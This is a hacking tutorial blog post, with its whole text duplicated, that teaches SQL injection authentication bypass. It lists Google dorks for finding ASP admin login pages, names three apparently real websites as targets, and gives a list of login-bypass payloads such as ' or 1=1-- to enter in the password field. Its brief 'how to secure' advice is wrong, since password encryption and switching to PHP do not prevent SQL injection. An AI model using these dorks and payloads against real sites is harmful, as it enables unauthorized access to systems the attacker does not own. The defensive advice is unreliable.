SQL INJECTION WEBSITE HACKING, Secugenuis
Today, i bring to you another hackin trick/method with SQL INJECTION..
What do we understand by sql injection?
A injecting sql queries into another database or using queries to get authentication bypass as an admin.
Part 1
Basic sql injection Gaining authentication bypass on an admin account. Most sites vulnerable to this are .asp, So first we need 2 find a site, start by opening Google.Now we type our dork: “definition of dork” ‘a search entry for a certain type of site/exploit”
There is a large number of google dork for basic sql injection.
Here are the best:
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
Example are listed below, make sure the url looks like this
http://www.casualtyprotection.com/login-admin.asp
http://login.fanhow.com/login-admin.asp
http://www.normatech.it/login-admin.asp
Now what to do once we get to our site. the site should look something like this :
Welcome to xxxxxxxxxx administrator panel
Username :
Password :
So what we do here is in the USERNAME, we always type “Admin” as the username and for our PASSWORD we type our sql injection.
Here is a list of sql injections..
‘ or ’1′=’1
‘ or ‘x’=’x
‘ or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
‘or’1=1′
TYPE ANY ONE OF THESE IN PASSWORD SPACE… There are many more but these are the best ones that i know.
what this sql injection is doing :
Confusing the database till it gives you authentication bypass. So your input should look like this
username: Admin
password: ’or’1′=’1
So click submit and you’re in. . Wow.
NOTE not all sites are vulnerable.
HOW TO SECURE YOUR SITE FROM THIS ATTACK
1- Put encryption on the passwords.
2- Change the platform of your website from asp to php.
Disclaimer
:::am using this as a tutorial for educative aspect and not for crime. . . So be careful.
What do we understand by sql injection?
A injecting sql queries into another database or using queries to get authentication bypass as an admin.
Part 1
Basic sql injection Gaining authentication bypass on an admin account. Most sites vulnerable to this are .asp, So first we need 2 find a site, start by opening Google.Now we type our dork: “definition of dork” ‘a search entry for a certain type of site/exploit”
There is a large number of google dork for basic sql injection.
Here are the best:
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
Example are listed below, make sure the url looks like this
http://www.casualtyprotection.com/login-admin.asp
http://login.fanhow.com/login-admin.asp
http://www.normatech.it/login-admin.asp
Now what to do once we get to our site. the site should look something like this :
Welcome to xxxxxxxxxx administrator panel
Username :
Password :
So what we do here is in the USERNAME, we always type “Admin” as the username and for our PASSWORD we type our sql injection.
Here is a list of sql injections..
‘ or ’1′=’1
‘ or ‘x’=’x
‘ or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
‘or’1=1′
TYPE ANY ONE OF THESE IN PASSWORD SPACE… There are many more but these are the best ones that i know.
what this sql injection is doing :
Confusing the database till it gives you authentication bypass. So your input should look like this
username: Admin
password: ’or’1′=’1
So click submit and you’re in. . Wow.
NOTE not all sites are vulnerable.
HOW TO SECURE YOUR SITE FROM THIS ATTACK
1- Put encryption on the passwords.
2- Change the platform of your website from asp to php.
Disclaimer
:::am using this as a tutorial for educative aspect and not for crime. . . So be careful.
0 comments: